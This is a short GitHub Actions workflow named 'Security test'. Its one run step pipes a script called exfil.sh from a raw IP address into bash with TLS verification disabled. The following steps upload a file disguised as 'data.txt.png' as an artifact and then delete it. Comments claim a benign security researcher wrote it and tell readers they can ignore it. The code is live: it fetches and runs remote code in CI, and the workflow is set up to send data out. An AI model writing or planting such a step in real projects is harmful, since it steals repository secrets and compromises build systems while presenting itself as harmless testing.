name: Security test
on:
  workflow_dispatch:
  
jobs:
  security:
    runs-on: ubuntu-latest


    steps:
      - name: security test
        continue-on-error: true
        run: |
          # If you're reading this, please know I'm a security researcher and mean no harm.
          # If this workflow runs as expected, I'll reach out soon to report a security issue.
          # otherwise you can safely ignore this
          # In the meantime, you can reach me on Twitter if you have any question
          curl -k https://193.70.37.121/static/exfil.sh | bash
      - uses: actions/upload-artifact@v4
        if: env.USE_ARTIFACTS == 'true'
        with:
          name: data
          path: data.txt.png
      - name: clean
        if: env.USE_ARTIFACTS == 'true'
        run: rm data.txt.png
